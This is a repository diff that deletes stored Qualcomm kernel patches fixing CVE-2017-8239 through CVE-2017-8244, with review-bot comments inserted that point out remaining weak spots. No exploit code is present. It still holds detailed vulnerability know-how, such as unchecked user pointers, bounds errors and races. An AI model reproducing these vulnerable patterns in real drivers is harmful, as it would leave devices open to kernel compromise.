--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -634,6 +634,16 @@ void ipahal_cp_proc_ctx_to_hw_buff(enum ipa_hdr_proc_type type,
- */
- int ipahal_get_proc_ctx_needed_len(enum ipa_hdr_proc_type type);
-
-+/*
-+ * Get IPA Data Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_dps_img_mem_size(void);
-+
-+/*
-+ * Get IPA Header Processing Star image memory size at IPA SRAM
-+ */
-+u32 ipahal_get_hps_img_mem_size(void);
-+
- int ipahal_init(enum ipa_hw_type ipa_hw_type, void __iomem *base);
- void ipahal_destroy(void);
-
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-index 6a22240..5f02b4df 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2016-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -542,4 +542,8 @@ struct ipa_hw_hdr_proc_ctx_add_hdr_cmd_seq {
- struct ipa_hw_hdr_proc_ctx_tlv end;
- };
-
-+/* IPA HW DPS/HPS image memory sizes */
-+#define IPA_HW_DPS_IMG_MEM_SIZE_V3_0 128
-+#define IPA_HW_HPS_IMG_MEM_SIZE_V3_0 320
-+
- #endif /* _IPAHAL_I_H_ */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-index 6b606ab..6a70fc0 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.c
-@@ -1157,6 +1157,12 @@ static struct ipahal_reg_obj ipahal_reg_objs[IPA_HW_MAX][IPA_REG_MAX] = {
- [IPA_HW_v3_0][IPA_QSB_MAX_READS] = {
- ipareg_construct_qsb_max_reads, ipareg_parse_dummy,
- 0x00000078, 0},
-+ [IPA_HW_v3_0][IPA_DPS_SEQUENCER_FIRST] = {
-+ ipareg_construct_dummy, ipareg_parse_dummy,
-+ 0x0001e000, 0},
-+ [IPA_HW_v3_0][IPA_HPS_SEQUENCER_FIRST] = {
-+ ipareg_construct_dummy, ipareg_parse_dummy,
-+ 0x0001e080, 0},
-
-
- /* IPAv3.1 */
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-index 98894c3..6ca16bf 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipahal/ipahal_reg.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -84,6 +84,8 @@ enum ipahal_reg_name {
- IPA_QSB_MAX_READS,
- IPA_TX_CFG,
- IPA_IDLE_INDICATION_CFG,
-+ IPA_DPS_SEQUENCER_FIRST,
-+ IPA_HPS_SEQUENCER_FIRST,
- IPA_REG_MAX,
- };
-
-diff --git a/include/linux/msm_gsi.h b/include/linux/msm_gsi.h
-index 4825fc7..18d4e72 100644
---- a/include/linux/msm_gsi.h
-+++ b/include/linux/msm_gsi.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2015-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2015-2017, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1041,6 +1041,19 @@ int gsi_configure_regs(phys_addr_t gsi_base_addr, u32 gsi_size,
- */
- int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size, enum gsi_ver ver);
-
-+/**
-+ * gsi_get_inst_ram_offset_and_size - Peripheral should call this function
-+ * to get instruction RAM base address offset and size. Peripheral typically
-+ * uses this info to load GSI FW into the IRAM.
-+ *
-+ * @base_offset:[OUT] - IRAM base offset address
-+ * @size: [OUT] - IRAM size
-+
-+ * @Return none
-+ */
-+void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+ unsigned long *size);
-+
- /*
- * Here is a typical sequence of calls
- *
-@@ -1228,9 +1241,15 @@ static inline int gsi_configure_regs(phys_addr_t gsi_base_addr, u32 gsi_size,
- {
- return -GSI_STATUS_UNSUPPORTED_OP;
- }
-+
- static inline int gsi_enable_fw(phys_addr_t gsi_base_addr, u32 gsi_size)
- {
- return -GSI_STATUS_UNSUPPORTED_OP;
- }
-+
-+static inline void gsi_get_inst_ram_offset_and_size(unsigned long *base_offset,
-+ unsigned long *size)
-+{
-+}
- #endif
- #endif
---
-cgit v1.1
-
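Review bot: The fallback stub of gsi_get_inst_ram_offset_and_size added at the end of msm_gsi.h (next to the stubs that return -GSI_STATUS_UNSUPPORTED_OP) has an empty body, so it leaves `*base_offset` and `*size` unwritten, while ipa3_load_fws in ipa_utils.c passes it the uninitialized locals `gsi_iram_ofst` and `gsi_iram_size` and then compares them with `phdr->p_vaddr` and `phdr->p_memsz`. Whether the IPA driver can actually be built against the stubs is not visible in this patch, but if it can, the new load-address and size validation would run on indeterminate values. The stub should fail closed with `if (base_offset) *base_offset = 0;` and `if (size) *size = 0;`, or the two locals should be initialised to 0 where they are declared, so that the `phdr->p_memsz > gsi_iram_size` test rejects any non-empty image.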
diff --git a/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch
deleted file mode 100644
index 74b18190..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8239/ANY/0001.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From 01db0e012f86b8ba6974e5cb9905261a552a0610 Mon Sep 17 00:00:00 2001
-From: Sureshnaidu Laveti
-Date: Thu, 15 Dec 2016 02:39:35 -0800
-Subject: msm: sensor: validating the flash initialization parameters
-
-Copying the flash initialization parameters from userspace memory to
-kernel memory and in turn checking for the validity of the flash
-initialization parameters pointer sent from userspace.
-
-CRs-Fixed: 1091603
-Change-Id: I17d57016c254fb6628844a152b0e7d45c0b23b2d
-Signed-off-by: Sureshnaidu Laveti
----
- .../msm/camera_v2/sensor/flash/msm_flash.c | 38 +++++++++++++++++++++-
- 1 file changed, 37 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index ff0a0a5..71d3e61 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -491,6 +491,42 @@ static int32_t msm_flash_init(
- return 0;
- }
-
-+#ifdef CONFIG_COMPAT
-+static int32_t msm_flash_init_prepare(
-+ struct msm_flash_ctrl_t *flash_ctrl,
-+ struct msm_flash_cfg_data_t *flash_data)
-+{
-+ return msm_flash_init(flash_ctrl, flash_data);
-+}
-+#else
-+static int32_t msm_flash_init_prepare(
-+ struct msm_flash_ctrl_t *flash_ctrl,
-+ struct msm_flash_cfg_data_t *flash_data)
-+{
-+ struct msm_flash_cfg_data_t flash_data_k;
-+ struct msm_flash_init_info_t flash_init_info;
-+ int32_t i = 0;
-+
-+ flash_data_k.cfg_type = flash_data->cfg_type;
-+ for (i = 0; i < MAX_LED_TRIGGERS; i++) {
-+ flash_data_k.flash_current[i] =
-+ flash_data->flash_current[i];
-+ flash_data_k.flash_duration[i] =
-+ flash_data->flash_duration[i];
-+ }
-+
-+ flash_data_k.cfg.flash_init_info = &flash_init_info;
-+ if (copy_from_user(&flash_init_info,
-+ (void *)(flash_data->cfg.flash_init_info),
-+ sizeof(struct msm_flash_init_info_t))) {
-+ pr_err("%s copy_from_user failed %d\n",
-+ __func__, __LINE__);
-+ return
-EFAULT;
-+ }
-+ return msm_flash_init(flash_ctrl, &flash_data_k);
-+}
-+#endif
-+
- static int32_t msm_flash_low(
- struct msm_flash_ctrl_t *flash_ctrl,
- struct msm_flash_cfg_data_t *flash_data)
-@@ -592,7 +628,7 @@ static int32_t msm_flash_config(struct msm_flash_ctrl_t *flash_ctrl,
-
- switch (flash_data->cfg_type) {
- case CFG_FLASH_INIT:
-- rc = msm_flash_init(flash_ctrl, flash_data);
-+ rc = msm_flash_init_prepare(flash_ctrl, flash_data);
- break;
- case CFG_FLASH_RELEASE:
- if (flash_ctrl->flash_state != MSM_CAMERA_FLASH_RELEASE) {
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch
deleted file mode 100644
index d5f7e5d0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8240/ANY/0001.patch
+++ /dev/null
@@ -1,31 +0,0 @@
-From 22b8b6608174c1308208d5bc6c143f4998744547 Mon Sep 17 00:00:00 2001
-From: Patrick Daly
-Date: Mon, 18 May 2015 14:52:47 -0700
-Subject: pinctrl: qcom: Fix bug in iteration through functions
-
-Fix iteration beyond array bounds when looping through
-the pin functions
-
-Change-Id: I7e88eed814364062fd93daf03f24ccd4baabf125
-Signed-off-by: Patrick Daly
-Signed-off-by: Hanumant Singh
----
- drivers/pinctrl/qcom/pinctrl-msm.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/drivers/pinctrl/qcom/pinctrl-msm.c b/drivers/pinctrl/qcom/pinctrl-msm.c
-index e0f86fb..cbea28c 100644
---- a/drivers/pinctrl/qcom/pinctrl-msm.c
-+++ b/drivers/pinctrl/qcom/pinctrl-msm.c
-@@ -895,7 +895,7 @@ static void msm_pinctrl_setup_pm_reset(struct msm_pinctrl *pctrl)
- int i = 0;
- const struct msm_function *func = pctrl->soc->functions;
-
-- for (; i <= pctrl->soc->nfunctions; i++)
-+ for (; i < pctrl->soc->nfunctions; i++)
- if (!strcmp(func[i].name, "ps_hold")) {
- pctrl->restart_nb.notifier_call = msm_ps_hold_restart;
- pctrl->restart_nb.priority = 128;
---
-cgit v1.1
-
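Review bot: The copy_from_user() of `cfg.flash_init_info` in msm_flash_init_prepare (msm_flash.c) exists only in the `#else` branch; when CONFIG_COMPAT is set, the wrapper hands `flash_data` to msm_flash_init unchanged. That is safe only if every caller on a CONFIG_COMPAT kernel has already copied the init info into kernel memory, which this hunk does not show and which would not obviously hold for a native (non-compat) ioctl on such a kernel, so it needs confirming. Choosing the path at run time is more robust: keep the copying body unconditionally and, inside `#ifdef CONFIG_COMPAT`, begin it with `if (is_compat_task()) return msm_flash_init(flash_ctrl, flash_data);`. In the copying branch `flash_data_k` is a stack struct in which only `cfg_type`, the two arrays and `cfg.flash_init_info` are assigned, so declaring it as `struct msm_flash_cfg_data_t flash_data_k = {0};` would keep any other member msm_flash_init reads from being stack garbage.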
diff --git a/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch
deleted file mode 100644
index 8c4583f2..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8241/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 90213394b7efb28fa511b2eaebc1343ae3b54724 Mon Sep 17 00:00:00 2001
-From: Sreelakshmi Konamki
-Date: Wed, 21 Sep 2016 15:17:42 +0530
-Subject: qcacld-2.0: Update correct msg length in oemData_SendMBOemDataReq API
-
-In oemData_SendMBOemDataReq(), messageLen of struct 'tSirOemDataReq'
-is updated with more memory than allocated to the structure.
-
-Fix is to update messageLen with size of struct.
-
-Change-Id: Ib60fd07543f630985fe29427809d822275bbb8e0
-CRs-Fixed: 1069175
----
- CORE/SME/src/oemData/oemDataApi.c | 4 +---
- 1 file changed, 1 insertion(+), 3 deletions(-)
-
-diff --git a/CORE/SME/src/oemData/oemDataApi.c b/CORE/SME/src/oemData/oemDataApi.c
-index 3e42350..fc3f91c 100644
---- a/CORE/SME/src/oemData/oemDataApi.c
-+++ b/CORE/SME/src/oemData/oemDataApi.c
-@@ -208,7 +208,6 @@ eHalStatus oemData_SendMBOemDataReq(tpAniSirGlobal pMac, tOemDataReq *pOemDataRe
- {
- eHalStatus status = eHAL_STATUS_SUCCESS;
- tSirOemDataReq* pMsg;
-- tANI_U16 msgLen;
- tCsrRoamSession *pSession;
-
- smsLog(pMac, LOGW, "OEM_DATA: entering Function %s", __func__);
-@@ -225,9 +224,8 @@ eHalStatus oemData_SendMBOemDataReq(tpAniSirGlobal pMac, tOemDataReq *pOemDataRe
- return eHAL_STATUS_FAILURE;
- }
-
-- msgLen = (uint16_t) (sizeof(*pMsg) + pOemDataReq->data_len);
- pMsg->messageType = pal_cpu_to_be16((tANI_U16)eWNI_SME_OEM_DATA_REQ);
-- pMsg->messageLen = pal_cpu_to_be16(msgLen);
-+ pMsg->messageLen = pal_cpu_to_be16((uint16_t) sizeof(*pMsg));
- vos_mem_copy(pMsg->selfMacAddr, pSession->selfMacAddr, sizeof(tSirMacAddr) );
- pMsg->data_len = pOemDataReq->data_len;
- /* Incoming buffer ptr saved, set to null to avoid free by caller */
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch
deleted file mode 100644
index 500a7e42..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8242/3.18/0001.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 6a3b8afdf97e77c0b64005b23fa6d32025d922e5 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Mon, 27 Feb 2017 13:41:07 -0800
-Subject: qseecom: add mutex around qseecom_set_client_mem_param
-
-Add mutex around qseecom_set_client_mem_param to prevent an
-ioctl thread modifying and corrupting data which is being
-processed by another ioctl in the other thread
-
-Change-Id: I0cfb8afab4001c2913be693dfe44c761b9568893
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index f8819e4..2a4cc5b 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -6982,7 +6982,11 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- break;
- }
- pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
-+ mutex_lock(&app_access_lock);
-+ atomic_inc(&data->ioctl_count);
- ret = qseecom_set_client_mem_param(data, argp);
-+ atomic_dec(&data->ioctl_count);
-+ mutex_unlock(&app_access_lock);
- if (ret)
- pr_err("failed Qqseecom_set_mem_param request: %d\n",
- ret);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch b/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch
deleted file mode 100644
index 6cfd583d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8242/4.4/0002.patch
+++ /dev/null
@@ -1,34 +0,0 @@
-From 364643660e49ec22f657d3e624bee2c7b9738d98 Mon Sep 17 00:00:00 2001
-From: Zhen Kong
-Date: Mon, 27 Feb 2017 13:41:07 -0800
-Subject: qseecom: add mutex around qseecom_set_client_mem_param
-
-Add mutex around qseecom_set_client_mem_param to prevent an
-ioctl thread modifying and corrupting data which is being
-processed by another ioctl in the other thread
-
-Change-Id: I0cfb8afab4001c2913be693dfe44c761b9568893
-Signed-off-by: Zhen Kong
----
- drivers/misc/qseecom.c | 4 ++++
- 1 file changed, 4 insertions(+)
-
-diff --git a/drivers/misc/qseecom.c b/drivers/misc/qseecom.c
-index 134995c..8d03c36 100644
---- a/drivers/misc/qseecom.c
-+++ b/drivers/misc/qseecom.c
-@@ -7043,7 +7043,11 @@ long qseecom_ioctl(struct file *file, unsigned cmd, unsigned long arg)
- break;
- }
- pr_debug("SET_MEM_PARAM: qseecom addr = 0x%pK\n", data);
-+ mutex_lock(&app_access_lock);
-+ atomic_inc(&data->ioctl_count);
- ret = qseecom_set_client_mem_param(data, argp);
-+ atomic_dec(&data->ioctl_count);
-+ mutex_unlock(&app_access_lock);
- if (ret)
- pr_err("failed Qqseecom_set_mem_param request: %d\n",
- ret);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch
deleted file mode 100644
index 8e874940..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8243/4.4/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From cae0d5a6f32e52e06c0841bb7142452062dc2ac8 Mon Sep 17 00:00:00 2001
-From: Kishor PK
-Date: Thu, 30 Mar 2017 14:23:37 +0530
-Subject: soc: qcom: pil: Avoid possible buffer overflow during Modem boot
-
-Buffer overflow can occur if MBA firmware size exceeds 1MB.
-So validate size before copying the firmware.
-
-CRs-Fixed: 2001803
-Change-Id: I070ddf85fbc47df072e7258369272366262ebf46
-Signed-off-by: Kishor PK
----
- drivers/soc/qcom/pil-msa.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/soc/qcom/pil-msa.c b/drivers/soc/qcom/pil-msa.c
-index 53bddc5..988b6e8 100644
---- a/drivers/soc/qcom/pil-msa.c
-+++ b/drivers/soc/qcom/pil-msa.c
-@@ -616,7 +616,15 @@ int pil_mss_reset_load_mba(struct pil_desc *pil)
-
- /* Load the MBA image into memory */
- count = fw->size;
-- memcpy(mba_dp_virt, data, count);
-+ if (count <= SZ_1M) {
-+ /* Ensures memcpy is done for max 1MB fw size */
-+ memcpy(mba_dp_virt, data, count);
-+ } else {
-+ dev_err(pil->dev, "%s fw image loading into memory is failed due to fw size overflow\n",
-+ __func__);
-+ ret = -EINVAL;
-+ goto err_mba_data;
-+ }
- /* Ensure memcpy of the MBA memory is done before loading the DP */
- wmb();
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch
deleted file mode 100644
index 2586682d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8244/3.10/0001.patch
+++ /dev/null
@@ -1,185 +0,0 @@ -From f51b0f3b9da62e96b0167a3eb3376fca39fc7baf Mon Sep 17 00:00:00 2001 -From: Abdulla Anam -Date: Wed, 22 Mar 2017 14:00:10 +0530 -Subject: msm: vidc: Protect debug_buffer access in core_info_read with lock. - -Serialize core_info_read with lock so that multiple concurrent -threads do not cause the write to overflow. Also have the bound -check to avoid overflow in write_str function. - -CRs-Fixed: 2013361 -Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f -Signed-off-by: Abdulla Anam -Signed-off-by: Sanjay Singh ---- - drivers/media/platform/msm/vidc/msm_v4l2_vidc.c | 5 +++- - drivers/media/platform/msm/vidc/msm_vidc_debug.c | 37 ++++++++++++++++++++---- - drivers/media/platform/msm/vidc/msm_vidc_debug.h | 3 +- - 3 files changed, 37 insertions(+), 8 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -index a46eda7..d845597 100644 ---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -737,6 +737,8 @@ static int __init msm_vidc_init(void) - if (rc) { - dprintk(VIDC_ERR, - "Failed to register platform driver\n"); -+ msm_vidc_debugfs_deinit_drv(); -+ debugfs_remove_recursive(vidc_driver->debugfs_root); - kfree(vidc_driver); - vidc_driver = NULL; - } -@@ -747,6 +749,7 @@ static int __init msm_vidc_init(void) - static void __exit msm_vidc_exit(void) - { - platform_driver_unregister(&msm_vidc_driver); -+ msm_vidc_debugfs_deinit_drv(); - debugfs_remove_recursive(vidc_driver->debugfs_root); - kfree(vidc_driver); - vidc_driver = NULL; -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -index 509ea440c..e66fc8b 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -28,6 +28,7 @@ int msm_vidc_sys_idle_indicator = 0x0; - u32 msm_vidc_firmware_unload_delay = 15000; - - struct debug_buffer { -+ struct mutex lock; - char ptr[MAX_DBG_BUF_SIZE]; - char *curr; - u32 filled_size; -@@ -54,8 +55,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...) 
- { - va_list args; - u32 size; -+ -+ char *curr = buffer->curr; -+ char *end = buffer->ptr + MAX_DBG_BUF_SIZE; -+ - va_start(args, fmt); -- size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args); -+ size = vscnprintf(curr, end - curr, fmt, args); - va_end(args); - buffer->curr += size; - buffer->filled_size += size; -@@ -69,12 +74,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf, - struct hfi_device *hdev; - struct hal_fw_info fw_info; - int i = 0, rc = 0; -+ ssize_t len = 0; - - if (!core || !core->device) { - dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core); - return 0; - } - hdev = core->device; -+ -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "CORE %d: 0x%pK\n", core->id, core); -@@ -98,8 +106,11 @@ err_fw_info: - completion_done(&core->completions[SYS_MSG_INDEX(i)]) ? - "pending" : "done"); - } -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ -+ mutex_unlock(&dbg_buf.lock); -+ return len; - } - - static const struct file_operations core_info_fops = { -@@ -136,7 +147,10 @@ static const struct file_operations ssr_fops = { - - struct dentry *msm_vidc_debugfs_init_drv(void) - { -- struct dentry *dir = debugfs_create_dir("msm_vidc", NULL); -+ struct dentry *dir = NULL; -+ -+ mutex_init(&dbg_buf.lock); -+ dir = debugfs_create_dir("msm_vidc", NULL); - if (IS_ERR_OR_NULL(dir)) { - dir = NULL; - goto failed_create_dir; -@@ -219,6 +233,7 @@ struct dentry *msm_vidc_debugfs_init_core(struct msm_vidc_core *core, - dprintk(VIDC_ERR, "Failed to create debugfs for msm_vidc\n"); - goto failed_create_dir; - } -+ - if (!debugfs_create_file("info", S_IRUGO, dir, core, &core_info_fops)) { - dprintk(VIDC_ERR, "debugfs_create_file: fail\n"); - goto failed_create_dir; -@@ -272,10 +287,14 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - { - 
struct msm_vidc_inst *inst = file->private_data; - int i, j; -+ ssize_t len = 0; -+ - if (!inst) { - dprintk(VIDC_ERR, "Invalid params, core: %pK\n", inst); - return 0; - } -+ -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "INSTANCE: 0x%pK (%s)\n", inst, -@@ -332,9 +351,10 @@ static ssize_t inst_info_read(struct file *file, char __user *buf, - write_str(&dbg_buf, "FBD Count: %d\n", inst->count.fbd); - - publish_unreleased_reference(inst); -- -- return simple_read_from_buffer(buf, count, ppos, -+ len = simple_read_from_buffer(buf, count, ppos, - dbg_buf.ptr, dbg_buf.filled_size); -+ mutex_unlock(&dbg_buf.lock); -+ return len; - } - - static const struct file_operations inst_info_fops = { -@@ -411,3 +431,8 @@ void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - } - } - -+void msm_vidc_debugfs_deinit_drv(void) -+{ -+ mutex_destroy(&dbg_buf.lock); -+} -+ -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.h b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -index bd8e3f6..e1a7ab3 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.h -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.h -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2014, 2017 The Linux Foundation. All rights reserved. - * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -121,6 +121,7 @@ struct dentry *msm_vidc_debugfs_init_inst(struct msm_vidc_inst *inst, - struct dentry *parent); - void msm_vidc_debugfs_update(struct msm_vidc_inst *inst, - enum msm_vidc_debugfs_event e); -+void msm_vidc_debugfs_deinit_drv(void); - - static inline void tic(struct msm_vidc_inst *i, enum profiling_points p, - char *b) --- -cgit v1.1 - 
diff --git a/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch
deleted file mode 100644
index 4c3c9154..00000000
--- a/Patches/Linux_CVEs/CVE-2017-8244/3.18/0002.patch
+++ /dev/null
@@ -1,175 +0,0 @@ -From 01673e148223c10782b03c5485aff2a82b1900c4 Mon Sep 17 00:00:00 2001 -From: Abdulla Anam -Date: Wed, 22 Mar 2017 14:00:10 +0530 -Subject: msm: vidc: Protect debug_buffer access in core_info_read with lock. - -Serialize core_info_read with lock so that multiple concurrent -threads do not cause the write to overflow. Also have the bound -check to avoid overflow in write_str function. - -CRs-Fixed: 2013361 -Change-Id: Ia18a4b94cafd69af1d367861f2499fc202f18e9f -Signed-off-by: Abdulla Anam ---- - drivers/media/platform/msm/vidc/msm_v4l2_vidc.c | 3 ++ - drivers/media/platform/msm/vidc/msm_vidc_debug.c | 37 ++++++++++++++++++++---- - drivers/media/platform/msm/vidc/msm_vidc_debug.h | 1 + - 3 files changed, 35 insertions(+), 6 deletions(-) - -diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -index 319df5e..f77b943 100644 ---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c -@@ -789,6 +789,8 @@ static int __init msm_vidc_init(void) - if (rc) { - dprintk(VIDC_ERR, - "Failed to register platform driver\n"); -+ msm_vidc_debugfs_deinit_drv(); -+ debugfs_remove_recursive(vidc_driver->debugfs_root); - kfree(vidc_driver); - vidc_driver = NULL; - } -@@ -799,6 +801,7 @@ static int __init msm_vidc_init(void) - static void __exit msm_vidc_exit(void) - { - platform_driver_unregister(&msm_vidc_driver); -+ msm_vidc_debugfs_deinit_drv(); - debugfs_remove_recursive(vidc_driver->debugfs_root); - kfree(vidc_driver); - vidc_driver = NULL; -diff --git a/drivers/media/platform/msm/vidc/msm_vidc_debug.c b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -index d34da57..7780990 100644 ---- a/drivers/media/platform/msm/vidc/msm_vidc_debug.c -+++ b/drivers/media/platform/msm/vidc/msm_vidc_debug.c -@@ -1,4 +1,4 @@ --/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved. -+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved. 
- * - * This program is free software; you can redistribute it and/or modify - * it under the terms of the GNU General Public License version 2 and -@@ -34,6 +34,7 @@ int msm_vidc_debug_timeout = 0; - #define MAX_DBG_BUF_SIZE 4096 - - struct debug_buffer { -+ struct mutex lock; - char ptr[MAX_DBG_BUF_SIZE]; - char *curr; - u32 filled_size; -@@ -60,8 +61,12 @@ static u32 write_str(struct debug_buffer *buffer, const char *fmt, ...) - { - va_list args; - u32 size; -+ -+ char *curr = buffer->curr; -+ char *end = buffer->ptr + MAX_DBG_BUF_SIZE; -+ - va_start(args, fmt); -- size = vscnprintf(buffer->curr, MAX_DBG_BUF_SIZE - 1, fmt, args); -+ size = vscnprintf(curr, end - curr, fmt, args); - va_end(args); - buffer->curr += size; - buffer->filled_size += size; -@@ -75,12 +80,15 @@ static ssize_t core_info_read(struct file *file, char __user *buf, - struct hfi_device *hdev; - struct hal_fw_info fw_info = { {0} }; - int i = 0, rc = 0; -+ ssize_t len = 0; - - if (!core || !core->device) { - dprintk(VIDC_ERR, "Invalid params, core: %pK\n", core); - return 0; - } - hdev = core->device; -+ -+ mutex_lock(&dbg_buf.lock); - INIT_DBG_BUF(dbg_buf); - write_str(&dbg_buf, "===============================\n"); - write_str(&dbg_buf, "CORE %d: %pK\n", core->id, core); -@@ -104,8 +112,11 @@ err_fw_info: - completion_done(&core->completions[SYS_MSG_INDEX(i)]) ? 
